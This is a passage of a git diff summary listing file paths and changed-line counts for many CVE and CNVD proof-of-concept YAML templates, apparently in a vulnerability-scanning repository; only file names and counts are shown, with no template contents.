+- 
poc/cve/CVE-2017-5521.yaml | 20 +- poc/cve/CVE-2017-5631.yaml | 26 +- poc/cve/CVE-2017-6090.yaml | 35 +- poc/cve/CVE-2017-8917.yaml | 30 +- poc/cve/CVE-2017-9805.yaml | 27 +- poc/cve/CVE-2017-9822.yaml | 28 +- poc/cve/CVE-2018-0101.yaml | 7 +- poc/cve/CVE-2018-1000226.yaml | 54 +- poc/cve/CVE-2018-1000856.yaml | 24 +- poc/cve/CVE-2018-10230.yaml | 23 +- poc/cve/CVE-2018-10818.yaml | 29 +- poc/cve/CVE-2018-11231.yaml | 31 +- poc/cve/CVE-2018-14064.yaml | 21 +- poc/cve/CVE-2018-14912.yaml | 27 +- poc/cve/CVE-2018-15517.yaml | 28 +- poc/cve/CVE-2018-15535.yaml | 22 +- poc/cve/CVE-2018-16133.yaml | 23 +- poc/cve/CVE-2018-16167.yaml | 25 +- poc/cve/CVE-2018-16288.yaml | 23 +- poc/cve/CVE-2018-17422.yaml | 33 +- poc/cve/CVE-2018-17431.yaml | 25 +- poc/cve/CVE-2018-18608.yaml | 24 +- poc/cve/CVE-2018-19752.yaml | 28 +- poc/cve/CVE-2018-19877.yaml | 25 +- poc/cve/CVE-2018-20010.yaml | 26 +- poc/cve/CVE-2018-20011.yaml | 24 +- poc/cve/CVE-2018-20462.yaml | 29 +- poc/cve/CVE-2018-20470.yaml | 18 +- poc/cve/CVE-2018-20985.yaml | 24 +- poc/cve/CVE-2018-5233.yaml | 38 +- poc/cve/CVE-2018-5316.yaml | 36 +- poc/cve/CVE-2018-6008.yaml | 18 +- poc/cve/CVE-2018-6200.yaml | 21 +- poc/cve/CVE-2018-6910.yaml | 20 +- poc/cve/CVE-2018-7251.yaml | 32 +- poc/cve/CVE-2018-7467.yaml | 23 +- poc/cve/CVE-2018-7700.yaml | 34 +- poc/cve/CVE-2018-9118.yaml | 18 +- "poc/cve/CVE-2018\342\200\22314064.yaml" | 9 +- poc/cve/CVE-2019-1010287.yaml | 31 +- poc/cve/CVE-2019-10692.yaml | 33 +- poc/cve/CVE-2019-11013.yaml | 34 +- poc/cve/CVE-2019-11248.yaml | 16 +- poc/cve/CVE-2019-11370.yaml | 23 +- poc/cve/CVE-2019-12276.yaml | 82 +- poc/cve/CVE-2019-12962.yaml | 27 +- poc/cve/CVE-2019-13101.yaml | 33 +- poc/cve/CVE-2019-14251.yaml | 22 +- poc/cve/CVE-2019-15713.yaml | 24 +- poc/cve/CVE-2019-16123.yaml | 25 +- poc/cve/CVE-2019-16931.yaml | 28 +- poc/cve/CVE-2019-17418.yaml | 28 +- poc/cve/CVE-2019-18665.yaml | 23 +- poc/cve/CVE-2019-18818.yaml | 39 +- poc/cve/CVE-2019-19824.yaml | 20 +- 
poc/cve/CVE-2019-20210.yaml | 27 +- poc/cve/CVE-2019-20224.yaml | 25 +- poc/cve/CVE-2019-20933.yaml | 42 +- poc/cve/CVE-2019-2616.yaml | 23 +- poc/cve/CVE-2019-2767.yaml | 23 +- poc/cve/CVE-2019-6340.yaml | 29 +- poc/cve/CVE-2019-7238.yaml | 26 +- poc/cve/CVE-2019-7609.yaml | 35 +- poc/cve/CVE-2019-8446.yaml | 28 +- poc/cve/CVE-2019-8937.yaml | 53 +- poc/cve/CVE-2019-9082 (copy 2).yaml | 24 + poc/cve/CVE-2019-9082.yaml | 1 - poc/cve/CVE-2019-9915.yaml | 24 +- poc/cve/CVE-2020-10124 (copy 1).yaml | 32 - poc/cve/CVE-2020-10124.yaml | 3 +- poc/cve/CVE-2020-11455.yaml | 29 +- poc/cve/CVE-2020-11738.yaml | 38 +- poc/cve/CVE-2020-11978.yaml | 46 +- poc/cve/CVE-2020-11991.yaml | 93 +- poc/cve/CVE-2020-13117.yaml | 36 +- poc/cve/CVE-2020-13121.yaml | 41 +- poc/cve/CVE-2020-13945.yaml | 22 +- poc/cve/CVE-2020-14408.yaml | 29 +- poc/cve/CVE-2020-19282.yaml | 31 +- poc/cve/CVE-2020-19360.yaml | 21 +- poc/cve/CVE-2020-2036.yaml | 69 +- poc/cve/CVE-2020-20982.yaml | 33 +- poc/cve/CVE-2020-22211.yaml | 19 +- poc/cve/CVE-2020-24391.yaml | 22 +- poc/cve/CVE-2020-27467.yaml | 18 +- poc/cve/CVE-2020-27735.yaml | 85 +- poc/cve/CVE-2020-28871.yaml | 36 +- poc/cve/CVE-2020-28976.yaml | 42 +- poc/cve/CVE-2020-29227.yaml | 18 +- poc/cve/CVE-2020-35749.yaml | 19 +- poc/cve/CVE-2020-35848.yaml | 39 +- poc/cve/CVE-2020-36510.yaml | 29 +- poc/cve/CVE-2020-5307.yaml | 83 +- poc/cve/CVE-2020-7980.yaml | 22 +- poc/cve/CVE-2020-8497.yaml | 20 +- poc/cve/CVE-2020-8641.yaml | 22 +- poc/cve/CVE-2020-8644.yaml | 40 +- poc/cve/CVE-2020-8654.yaml | 42 +- poc/cve/CVE-2020-9043.yaml | 36 +- poc/cve/CVE-2020-9483.yaml | 99 +- poc/cve/CVE-20200924a.yaml | 6 + poc/cve/CVE-2021-20038.yaml | 50 +- poc/cve/CVE-2021-20090.yaml | 88 +- poc/cve/CVE-2021-20837.yaml | 52 +- poc/cve/CVE-2021-21287.yaml | 18 +- poc/cve/CVE-2021-21745.yaml | 20 +- poc/cve/CVE-2021-21801.yaml | 31 +- poc/cve/CVE-2021-21803.yaml | 34 +- poc/cve/CVE-2021-22054.yaml | 17 +- poc/cve/CVE-2021-22145.yaml | 33 +- poc/cve/CVE-2021-22214.yaml 
| 25 +- poc/cve/CVE-2021-22986.yaml | 45 +- poc/cve/CVE-2021-23241.yaml | 24 +- poc/cve/CVE-2021-24146.yaml | 31 +- poc/cve/CVE-2021-24236.yaml | 31 +- poc/cve/CVE-2021-24275.yaml | 37 +- poc/cve/CVE-2021-24284.yaml | 25 +- poc/cve/CVE-2021-24285.yaml | 35 +- poc/cve/CVE-2021-24286.yaml | 63 +- poc/cve/CVE-2021-24335.yaml | 29 +- poc/cve/CVE-2021-24364.yaml | 26 +- poc/cve/CVE-2021-24488.yaml | 24 +- poc/cve/CVE-2021-24498.yaml | 37 +- poc/cve/CVE-2021-24762.yaml | 38 +- poc/cve/CVE-2021-24838.yaml | 32 +- poc/cve/CVE-2021-24997.yaml | 33 +- poc/cve/CVE-2021-25028.yaml | 34 +- poc/cve/CVE-2021-25033.yaml | 22 +- poc/cve/CVE-2021-25075.yaml | 26 +- poc/cve/CVE-2021-25085.yaml | 24 +- poc/cve/CVE-2021-25112.yaml | 34 +- poc/cve/CVE-2021-25118.yaml | 35 +- poc/cve/CVE-2021-26085.yaml | 35 +- poc/cve/CVE-2021-26598.yaml | 32 +- poc/cve/CVE-2021-27519.yaml | 26 +- poc/cve/CVE-2021-27561.yaml | 18 +- poc/cve/CVE-2021-27748.yaml | 22 +- poc/cve/CVE-2021-28149.yaml | 33 +- poc/cve/CVE-2021-28150.yaml | 38 +- poc/cve/CVE-2021-28377.yaml | 21 +- poc/cve/CVE-2021-28918.yaml | 23 +- poc/cve/CVE-2021-29490.yaml | 37 +- poc/cve/CVE-2021-31249.yaml | 37 +- poc/cve/CVE-2021-31589.yaml | 39 +- poc/cve/CVE-2021-31682.yaml | 36 +- poc/cve/CVE-2021-31805.yaml | 21 +- poc/cve/CVE-2021-3223.yaml | 29 +- poc/cve/CVE-2021-32305.yaml | 19 +- poc/cve/CVE-2021-32618.yaml | 22 +- poc/cve/CVE-2021-33044.yaml | 33 +- poc/cve/CVE-2021-33544.yaml | 37 +- poc/cve/CVE-2021-33807.yaml | 24 +- poc/cve/CVE-2021-34370.yaml | 38 +- poc/cve/CVE-2021-34643.yaml | 37 +- poc/cve/CVE-2021-35265.yaml | 42 +- poc/cve/CVE-2021-35587.yaml | 37 +- poc/cve/CVE-2021-36356.yaml | 31 +- poc/cve/CVE-2021-37216.yaml | 40 +- poc/cve/CVE-2021-37416.yaml | 36 +- poc/cve/CVE-2021-37580.yaml | 18 +- poc/cve/CVE-2021-38702.yaml | 28 +- poc/cve/CVE-2021-38704.yaml | 20 +- poc/cve/CVE-2021-38751.yaml | 25 +- poc/cve/CVE-2021-39211.yaml | 23 +- poc/cve/CVE-2021-39226.yaml | 38 +- poc/cve/CVE-2021-39312.yaml | 23 +- 
poc/cve/CVE-2021-40868.yaml | 29 +- poc/cve/CVE-2021-40870.yaml | 36 +- poc/cve/CVE-2021-40960.yaml | 23 +- poc/cve/CVE-2021-40978.yaml | 26 +- poc/cve/CVE-2021-41192.yaml | 29 +- poc/cve/CVE-2021-41266.yaml | 31 +- poc/cve/CVE-2021-41291.yaml | 22 +- poc/cve/CVE-2021-41569.yaml | 22 +- poc/cve/CVE-2021-41653.yaml | 29 +- poc/cve/CVE-2021-41691.yaml | 19 +- poc/cve/CVE-2021-4191.yaml | 25 +- poc/cve/CVE-2021-42258.yaml | 49 +- poc/cve/CVE-2021-43798.yaml | 43 +- poc/cve/CVE-2021-44103.yaml | 14 +- poc/cve/CVE-2021-44228.yaml | 78 +- poc/cve/CVE-2021-44451.yaml | 71 +- poc/cve/CVE-2021-44521.yaml | 50 +- poc/cve/CVE-2021-44528.yaml | 28 +- poc/cve/CVE-2021-45428.yaml | 21 +- poc/cve/CVE-2021-45967.yaml | 27 +- poc/cve/CVE-2021-45968.yaml | 28 +- poc/cve/CVE-2021-46005.yaml | 25 +- poc/cve/CVE-2021-46379.yaml | 17 +- poc/cve/CVE-2021-46381.yaml | 22 +- poc/cve/CVE-2021-46417.yaml | 20 +- poc/cve/CVE-2021-46422.yaml | 24 +- poc/cve/CVE-2022-0208.yaml | 37 +- poc/cve/CVE-2022-0281.yaml | 31 +- poc/cve/CVE-2022-0543.yaml | 30 +- poc/cve/CVE-2022-0594.yaml | 26 +- poc/cve/CVE-2022-0599.yaml | 35 +- poc/cve/CVE-2022-0921.yaml | 57 + poc/cve/CVE-2022-0952.yaml | 28 +- poc/cve/CVE-2022-0968.yaml | 42 +- poc/cve/CVE-2022-1020.yaml | 26 +- poc/cve/CVE-2022-1221.yaml | 27 +- poc/cve/CVE-2022-1392.yaml | 21 +- poc/cve/CVE-2022-1597.yaml | 31 +- poc/cve/CVE-2022-1713.yaml | 19 +- poc/cve/CVE-2022-1815.yaml | 26 +- poc/cve/CVE-2022-1904.yaml | 27 +- poc/cve/CVE-2022-1906.yaml | 28 +- poc/cve/CVE-2022-1937.yaml | 27 +- poc/cve/CVE-2022-21705.yaml | 71 +- poc/cve/CVE-2022-2187.yaml | 26 +- poc/cve/CVE-2022-22536.yaml | 36 +- poc/cve/CVE-2022-2290.yaml | 27 +- poc/cve/CVE-2022-22972.yaml | 64 +- poc/cve/CVE-2022-23808.yaml | 51 +- poc/cve/CVE-2022-23944.yaml | 26 +- poc/cve/CVE-2022-24681.yaml | 41 +- poc/cve/CVE-2022-2486.yaml | 24 +- poc/cve/CVE-2022-2487.yaml | 27 +- poc/cve/CVE-2022-24899.yaml | 22 +- poc/cve/CVE-2022-25323.yaml | 32 +- poc/cve/CVE-2022-26134.yaml | 30 +- 
poc/cve/CVE-2022-26135.yaml | 4 + poc/cve/CVE-2022-26352.yaml | 23 +- poc/cve/CVE-2022-26564.yaml | 23 +- poc/cve/CVE-2022-26960.yaml | 17 +- poc/cve/CVE-2022-27927.yaml | 22 +- poc/cve/CVE-2022-28079.yaml | 22 +- poc/cve/CVE-2022-28080.yaml | 25 +- poc/cve/CVE-2022-29014.yaml | 25 +- poc/cve/CVE-2022-29299.yaml | 14 +- poc/cve/CVE-2022-29303.yaml | 27 +- poc/cve/CVE-2022-29548.yaml | 31 +- poc/cve/CVE-2022-30073.yaml | 42 +- poc/cve/CVE-2022-30489.yaml | 24 +- poc/cve/CVE-2022-30776.yaml | 25 +- poc/cve/CVE-2022-30777.yaml | 26 +- poc/cve/CVE-2022-32007.yaml | 21 +- poc/cve/CVE-2022-32025.yaml | 27 +- poc/cve/CVE-2022-32028.yaml | 27 +- poc/cve/CVE-2022-32409.yaml | 25 +- poc/cve/CVE-2022-32444.yaml | 16 +- poc/cve/CVE-2022-33119.yaml | 22 +- poc/cve/CVE-2022-34046.yaml | 29 +- poc/cve/CVE-2022-34047.yaml | 29 +- poc/cve/CVE-2022-34048.yaml | 26 +- poc/cve/CVE-2022-34049.yaml | 23 +- poc/cve/CVE-2022-35416.yaml | 22 +- poc/cve/CVE-2023-23752.yaml | 52 +- poc/cve/CVE-2023-34039.yaml | 67 + poc/cve/CVE-2023-35047.yaml | 2 +- poc/cve/CVE-2023-3836.yaml | 78 +- poc/cve/CVE-2024-1183.yaml | 36 + poc/cve/CVE-2024-32651.yaml | 57 + poc/cve/CVE-2024-35668.yaml | 59 + poc/cve/CVE-2024-3668.yaml | 59 + poc/cve/CVE-2024-4468.yaml | 59 + poc/cve/CVE-2024-4661.yaml | 59 + poc/cve/CVE-2024-5087.yaml | 59 + poc/cve/CVE-2024-5091.yaml | 59 + poc/cve/CVE-2024-5613.yaml | 59 + poc/cve/CVE-2024-5638.yaml | 59 + poc/cve/CVE-2024-5654.yaml | 59 + poc/cve/CVE-2024-5663.yaml | 59 + poc/cve/CVE-2024-5758.yaml | 59 + ...5770-535af98dd21b180aed9353b26ab61bf4.yaml | 59 + poc/cve/cnvd-2018-13393-1037.yaml | 12 +- poc/cve/cnvd-2019-01348-1040.yaml | 7 +- poc/cve/cnvd-2019-01348-1042.yaml | 33 - poc/cve/cnvd-2019-01348-1043.yaml | 4 +- poc/cve/cnvd-2019-01348-1044.yaml | 25 + poc/cve/cnvd-2019-06255-1046.yaml | 37 + poc/cve/cnvd-2019-06255-1050.yaml | 23 - poc/cve/cnvd-2019-32204-1053.yaml | 23 + poc/cve/cnvd-2019-32204-1054.yaml | 27 - ...67-1064.yaml => cnvd-2020-56167-1061.yaml} | 0 
...22-1068.yaml => cnvd-2020-62422-1069.yaml} | 0 poc/cve/cnvd-2020-68596-1073.yaml | 36 - poc/cve/cnvd-2020-68596-1074.yaml | 44 + poc/cve/cnvd-2021-01931-1077.yaml | 16 +- poc/cve/cnvd-2021-01931-1078.yaml | 26 + poc/cve/cnvd-2021-10543-1082.yaml | 21 - poc/cve/cnvd-2021-10543-1086.yaml | 6 +- ...36-1088.yaml => cnvd-2021-14536-1087.yaml} | 0 poc/cve/cnvd-2021-15822-1089.yaml | 27 - poc/cve/cnvd-2021-15822-1093.yaml | 22 + poc/cve/cnvd-2021-15822-1095.yaml | 7 +- ...24-1096.yaml => cnvd-2021-15824-1097.yaml} | 0 poc/cve/cnvd-2021-17369-1102.yaml | 12 +- poc/cve/cnvd-2021-26422-1103.yaml | 38 - poc/cve/cnvd-2021-28277-1105.yaml | 51 + poc/cve/cnvd-2021-28277-1107.yaml | 10 +- poc/cve/cnvd-2021-30167-1108.yaml | 36 - ...04-1113.yaml => cnvd-2021-49104-1114.yaml} | 0 poc/cve/cnvd-2022-03672-1116.yaml | 42 + poc/cve/cnvd-2022-03672-1117.yaml | 45 - poc/cve/cve-2000-0114-1297.yaml | 32 + poc/cve/cve-2002-1131-1304.yaml | 43 + poc/cve/cve-2007-4504-1342.yaml | 25 - poc/cve/cve-2008-6222.yaml | 31 + poc/cve/cve-2008-6668-1400.yaml | 28 - poc/cve/cve-2009-0545.yaml | 40 + poc/cve/cve-2009-1496.yaml | 31 - poc/cve/cve-2009-2015-1441.yaml | 26 - poc/cve/cve-2009-2100-1446.yaml | 37 - poc/cve/cve-2009-3053.yaml | 31 - poc/cve/cve-2010-0943.yaml | 30 + poc/cve/cve-2010-0972-1522.yaml | 26 - poc/cve/cve-2010-0982.yaml | 30 + poc/cve/cve-2010-1056.yaml | 30 - poc/cve/cve-2010-1302-1567.yaml | 28 - poc/cve/cve-2010-1305-1574.yaml | 26 - poc/cve/cve-2010-1307-1585.yaml | 26 - poc/cve/cve-2010-1308.yaml | 29 - poc/cve/cve-2010-1312-1598.yaml | 28 + poc/cve/cve-2010-1312.yaml | 30 + poc/cve/cve-2010-1313-1604.yaml | 30 + poc/cve/cve-2010-1314.yaml | 30 - poc/cve/cve-2010-1315.yaml | 30 + poc/cve/cve-2010-1345-1621.yaml | 27 + poc/cve/cve-2010-1345.yaml | 29 + poc/cve/cve-2010-1352.yaml | 30 - poc/cve/cve-2010-1353-1630.yaml | 28 - poc/cve/cve-2010-1469.yaml | 30 + poc/cve/cve-2010-1470-1653.yaml | 30 + poc/cve/cve-2010-1474.yaml | 29 - poc/cve/cve-2010-1491.yaml | 30 - 
poc/cve/cve-2010-1494.yaml | 29 + poc/cve/cve-2010-1532.yaml | 30 - poc/cve/cve-2010-1540-1729.yaml | 28 - poc/cve/cve-2010-1657-1761.yaml | 27 - poc/cve/cve-2010-1658-1765.yaml | 28 + poc/cve/cve-2010-1658.yaml | 30 + poc/cve/cve-2010-1659-1773.yaml | 28 - poc/cve/cve-2010-1714-1779.yaml | 30 + poc/cve/cve-2010-1715.yaml | 30 - poc/cve/cve-2010-1717-1789.yaml | 30 - poc/cve/cve-2010-1718.yaml | 30 - poc/cve/cve-2010-1858.yaml | 30 - poc/cve/cve-2010-1953-1841.yaml | 27 + poc/cve/cve-2010-1981.yaml | 34 + poc/cve/cve-2010-1982.yaml | 34 + poc/cve/cve-2010-2682-1960.yaml | 32 + poc/cve/cve-2010-2920.yaml | 33 - poc/cve/cve-2010-3203-1987.yaml | 34 + poc/cve/cve-2010-3203.yaml | 34 + poc/cve/cve-2010-4239-1997.yaml | 28 - poc/cve/cve-2010-4617.yaml | 33 - poc/cve/cve-2010-5028-2025.yaml | 29 + poc/cve/cve-2010-5278-2030.yaml | 32 + poc/cve/cve-2010-5278.yaml | 35 + poc/cve/cve-2011-2744.yaml | 33 - poc/cve/cve-2011-3315-2059.yaml | 25 - poc/cve/cve-2011-4926.yaml | 51 + poc/cve/cve-2011-5179.yaml | 48 - poc/cve/cve-2012-0896-2132.yaml | 31 - poc/cve/cve-2012-0981.yaml | 33 + poc/cve/cve-2012-2371.yaml | 50 + poc/cve/cve-2012-4273-2198.yaml | 33 + poc/cve/cve-2012-4768-2207.yaml | 32 + poc/cve/cve-2013-5528.yaml | 33 - poc/cve/cve-2013-5979-2280.yaml | 28 - poc/cve/cve-2013-7240.yaml | 40 + poc/cve/cve-2014-2962-2313.yaml | 25 + poc/cve/cve-2014-4561-2375.yaml | 35 - poc/cve/cve-2014-4940.yaml | 32 - poc/cve/cve-2014-9094.yaml | 49 + poc/cve/cve-2014-9606-2430.yaml | 35 + poc/cve/cve-2014-9609-2437.yaml | 33 + poc/cve/cve-2015-0554-2456.yaml | 32 - poc/cve/cve-2015-1880-2477.yaml | 31 - poc/cve/cve-2015-2166.yaml | 33 - poc/cve/cve-2015-3306-2502.yaml | 32 - poc/cve/cve-2015-4050.yaml | 27 - poc/cve/cve-2015-7780-2604.yaml | 36 + poc/cve/cve-2016-1000128-2651.yaml | 32 - poc/cve/cve-2016-1000132-2669.yaml | 41 - poc/cve/cve-2016-1000134-2678.yaml | 41 - poc/cve/cve-2016-1000143-2717.yaml | 33 - poc/cve/cve-2016-1000154-2740.yaml | 34 + poc/cve/cve-2016-10940-2757.yaml 
| 45 - poc/cve/cve-2016-6210.yaml | 33 - poc/cve/cve-2016-7552-2812.yaml | 34 - poc/cve/cve-2017-12542-2884.yaml | 38 + poc/cve/cve-2017-12615.yaml | 70 - poc/cve/cve-2017-14535-2928.yaml | 38 - poc/cve/cve-2017-15647-2955.yaml | 28 - poc/cve/cve-2017-15944-2965.yaml | 33 + poc/cve/cve-2017-17451-2983.yaml | 34 - poc/cve/cve-2017-18536-2995.yaml | 32 - poc/cve/cve-2017-3528-3012.yaml | 28 - poc/cve/cve-2017-5487.yaml | 67 - poc/cve/cve-2017-5521-3027.yaml | 40 + poc/cve/cve-2017-5631-3031.yaml | 34 + poc/cve/cve-2017-6090-3044.yaml | 44 - poc/cve/cve-2017-7391.yaml | 49 - poc/cve/cve-2017-8917-3078.yaml | 29 + poc/cve/cve-2017-9805-3104.yaml | 93 + poc/cve/cve-2017-9822-3106.yaml | 36 + poc/cve/cve-2018-1000129.yaml | 57 + poc/cve/cve-2018-1000226-3139.yaml | 51 - poc/cve/cve-2018-10818-3171.yaml | 40 - poc/cve/cve-2018-11409.yaml | 46 + poc/cve/cve-2018-1271.yaml | 23 +- poc/cve/cve-2018-14064-3301.yaml | 30 - poc/cve/cve-2018-14728.yaml | 40 - poc/cve/cve-2018-14912-3315.yaml | 27 - poc/cve/cve-2018-15517-3331.yaml | 29 - poc/cve/cve-2018-16133-3358.yaml | 31 - poc/cve/cve-2018-16167-3359.yaml | 29 + poc/cve/cve-2018-16288-3365.yaml | 32 + poc/cve/cve-2018-17422-3421.yaml | 34 - poc/cve/cve-2018-17431-3423.yaml | 38 + poc/cve/cve-2018-19386.yaml | 42 - poc/cve/cve-2018-19752(1).yaml | 52 - poc/cve/cve-2018-19877(1).yaml | 35 - poc/cve/cve-2018-20010(1).yaml | 47 - poc/cve/cve-2018-20011(1).yaml | 47 + poc/cve/cve-2018-20470-3497.yaml | 39 - poc/cve/cve-2018-20985-3507.yaml | 35 - poc/cve/cve-2018-3167.yaml | 47 - poc/cve/cve-2018-5233-3567.yaml | 34 - poc/cve/cve-2018-6008-3574.yaml | 36 + poc/cve/cve-2018-6200-3578.yaml | 32 - poc/cve/cve-2018-6910-3585.yaml | 31 + poc/cve/cve-2018-7251-3587.yaml | 31 - poc/cve/cve-2018-7467-3598.yaml | 31 + poc/cve/cve-2018-7700-3618.yaml | 33 + poc/cve/cve-2018-9118-3654.yaml | 39 - "poc/cve/cve-2018\342\200\22314064(1).yaml" | 21 + poc/cve/cve-2019-1010287-3696.yaml | 36 + poc/cve/cve-2019-10692(1).yaml | 35 + 
poc/cve/cve-2019-11013-3719.yaml | 19 + poc/cve/cve-2019-11248-3731.yaml | 37 - poc/cve/cve-2019-11370(1).yaml | 39 - poc/cve/cve-2019-12962(1).yaml | 40 + poc/cve/cve-2019-13101-3802.yaml | 37 - poc/cve/cve-2019-14251(1).yaml | 31 + poc/cve/cve-2019-15713-3887.yaml | 37 + poc/cve/cve-2019-16097.yaml | 54 - poc/cve/cve-2019-16123-3918.yaml | 31 - poc/cve/cve-2019-16278.yaml | 44 + poc/cve/cve-2019-16931(1).yaml | 41 - poc/cve/cve-2019-17418-3981.yaml | 30 - poc/cve/cve-2019-17558.yaml | 74 + poc/cve/cve-2019-18394.yaml | 39 + poc/cve/cve-2019-18665(1).yaml | 30 + poc/cve/cve-2019-18818-4021.yaml | 52 + poc/cve/cve-2019-19368.yaml | 44 + poc/cve/cve-2019-19824-4053.yaml | 33 - poc/cve/cve-2019-20210(1).yaml | 37 - poc/cve/cve-2019-20224(1).yaml | 48 - poc/cve/cve-2019-20933(1).yaml | 32 + poc/cve/cve-2019-2616(1).yaml | 29 - poc/cve/cve-2019-2767-4117.yaml | 27 - poc/cve/cve-2019-6340(1).yaml | 34 + poc/cve/cve-2019-7238-4207.yaml | 37 + poc/cve/cve-2019-7609-4233.yaml | 35 + poc/cve/cve-2019-8446-4252.yaml | 39 - poc/cve/cve-2019-8903.yaml | 45 - poc/cve/cve-2019-8937-4278.yaml | 36 + poc/cve/cve-2019-9082-4292.yaml | 23 - poc/cve/cve-2019-9915(1).yaml | 32 + poc/cve/cve-2020-10124(1).yaml | 31 + poc/cve/cve-2020-10220.yaml | 50 - poc/cve/cve-2020-11455-4397.yaml | 32 - poc/cve/cve-2020-11530.yaml | 48 + poc/cve/cve-2020-11738(1).yaml | 45 + poc/cve/cve-2020-11978(1).yaml | 57 + poc/cve/cve-2020-13117-4489.yaml | 29 + poc/cve/cve-2020-13121(1).yaml | 24 + poc/cve/cve-2020-13945-4535.yaml | 58 + poc/cve/cve-2020-14181.yaml | 45 - poc/cve/cve-2020-14408(1).yaml | 35 - poc/cve/cve-2020-14882.yaml | 46 + poc/cve/cve-2020-19282-4706.yaml | 33 - poc/cve/cve-2020-19360-4714.yaml | 30 + poc/cve/cve-2020-2036-4730.yaml | 34 - poc/cve/cve-2020-20982-4740.yaml | 35 - poc/cve/cve-2020-22211(1).yaml | 32 - poc/cve/cve-2020-22840.yaml | 39 + poc/cve/cve-2020-24223.yaml | 49 + poc/cve/cve-2020-24391-4811.yaml | 53 - poc/cve/cve-2020-25540.yaml | 44 - 
poc/cve/cve-2020-27467-4950.yaml | 31 - poc/cve/cve-2020-28976-4989.yaml | 30 + poc/cve/cve-2020-29227-5000.yaml | 30 + poc/cve/cve-2020-29395.yaml | 50 + poc/cve/cve-2020-3452(1).yaml | 31 + poc/cve/cve-2020-3452.yaml | 24 +- poc/cve/cve-2020-35749-5075.yaml | 46 + poc/cve/cve-2020-36510(1).yaml | 35 + poc/cve/cve-2020-6287.yaml | 64 - poc/cve/cve-2020-7980(1).yaml | 40 - poc/cve/cve-2020-8194.yaml | 49 + poc/cve/cve-2020-8497-5317.yaml | 32 + poc/cve/cve-2020-8641-5330.yaml | 32 + poc/cve/cve-2020-8654(1).yaml | 41 + poc/cve/cve-2020-9043(1).yaml | 64 + poc/cve/cve-20200924a.yaml | 33 + poc/cve/cve-2021-20038-5443.yaml | 38 + poc/cve/cve-2021-21287-5492.yaml | 38 - poc/cve/cve-2021-21745(1).yaml | 34 + poc/cve/cve-2021-21801-5531.yaml | 32 + poc/cve/cve-2021-21803-5536.yaml | 27 + poc/cve/cve-2021-22054(1).yaml | 32 + poc/cve/cve-2021-22145-5591.yaml | 37 + poc/cve/cve-2021-22214-5601.yaml | 41 - poc/cve/cve-2021-22986-5612.yaml | 60 + poc/cve/cve-2021-23241-5621.yaml | 30 + poc/cve/cve-2021-24146-5631.yaml | 32 - poc/cve/cve-2021-24236(1).yaml | 80 - poc/cve/cve-2021-24275-5661.yaml | 32 - poc/cve/cve-2021-24284(1).yaml | 62 - poc/cve/cve-2021-24285-5673.yaml | 33 - poc/cve/cve-2021-24286(1).yaml | 21 - poc/cve/cve-2021-24335-5703.yaml | 34 + poc/cve/cve-2021-24364-5721.yaml | 32 + poc/cve/cve-2021-24488(1).yaml | 40 + poc/cve/cve-2021-24498-5751.yaml | 31 - poc/cve/cve-2021-24838-5769.yaml | 28 - poc/cve/cve-2021-25033(1).yaml | 27 - poc/cve/cve-2021-25075(1).yaml | 53 - poc/cve/cve-2021-25085(1).yaml | 37 + poc/cve/cve-2021-25118(1).yaml | 39 + poc/cve/cve-2021-26085(1).yaml | 34 + poc/cve/cve-2021-27519(1).yaml | 38 - poc/cve/cve-2021-27748(1).yaml | 33 + poc/cve/cve-2021-28149-5943.yaml | 43 - poc/cve/cve-2021-28150-5949.yaml | 39 - poc/cve/cve-2021-28377(1).yaml | 27 + poc/cve/cve-2021-28918-5975.yaml | 37 + poc/cve/cve-2021-29490-6011.yaml | 28 + poc/cve/cve-2021-29622.yaml | 38 - poc/cve/cve-2021-30461.yaml | 38 + poc/cve/cve-2021-31249-6068.yaml | 23 - 
poc/cve/cve-2021-3129.yaml | 94 - poc/cve/cve-2021-31589-6095.yaml | 35 + poc/cve/cve-2021-31682-6102.yaml | 36 - poc/cve/cve-2021-31805(1).yaml | 48 - poc/cve/cve-2021-3223(1).yaml | 35 - poc/cve/cve-2021-32305-6134.yaml | 31 + poc/cve/cve-2021-33544-6176.yaml | 23 + poc/cve/cve-2021-33807-6211.yaml | 38 + poc/cve/cve-2021-34370-6221.yaml | 17 + poc/cve/cve-2021-34643-6238.yaml | 42 - poc/cve/cve-2021-35265-6245.yaml | 33 - poc/cve/cve-2021-36356(1).yaml | 35 + poc/cve/cve-2021-37216-6280.yaml | 35 - poc/cve/cve-2021-37416(1).yaml | 38 + poc/cve/cve-2021-37580-6292.yaml | 36 + poc/cve/cve-2021-38702-6314.yaml | 34 + poc/cve/cve-2021-38704-6317.yaml | 37 - poc/cve/cve-2021-38751-6320.yaml | 36 + poc/cve/cve-2021-39211(1).yaml | 31 + poc/cve/cve-2021-39226-6323.yaml | 30 + poc/cve/cve-2021-39312(1).yaml | 40 - poc/cve/cve-2021-41569(1).yaml | 28 - poc/cve/cve-2021-41691-6460.yaml | 45 - poc/cve/cve-2021-44103(1).yaml | 69 - poc/cve/cve-2021-44521-6556.yaml | 56 + poc/cve/cve-2021-44528(1).yaml | 35 + poc/cve/cve-2021-45428(1).yaml | 43 + poc/cve/cve-2021-45968-6588.yaml | 36 - poc/cve/cve-2021-46381-6597.yaml | 26 - poc/cve/cve-2021-46417(1).yaml | 32 + poc/cve/cve-2021-46422(1).yaml | 40 + poc/cve/cve-2022-0208(1).yaml | 34 - poc/cve/cve-2022-0543(1).yaml | 35 - poc/cve/cve-2022-0594(1).yaml | 37 + poc/cve/cve-2022-0599(1).yaml | 41 + poc/cve/cve-2022-0952(1).yaml | 47 + poc/cve/cve-2022-0968(1).yaml | 68 - poc/cve/cve-2022-1020(1).yaml | 41 - poc/cve/cve-2022-1221(1).yaml | 37 - poc/cve/cve-2022-1392(1).yaml | 34 + poc/cve/cve-2022-1597(1).yaml | 56 - poc/cve/cve-2022-1713(1).yaml | 37 - poc/cve/cve-2022-1815(1).yaml | 31 - poc/cve/cve-2022-1904(1).yaml | 35 - poc/cve/cve-2022-1906(1).yaml | 39 + poc/cve/cve-2022-1937(1).yaml | 38 - poc/cve/cve-2022-21705(1).yaml | 94 - poc/cve/cve-2022-2187(1).yaml | 36 + poc/cve/cve-2022-22536-6662.yaml | 56 + poc/cve/cve-2022-2290(1).yaml | 42 - poc/cve/cve-2022-22972(1).yaml | 93 + poc/cve/cve-2022-24681(1).yaml | 43 - 
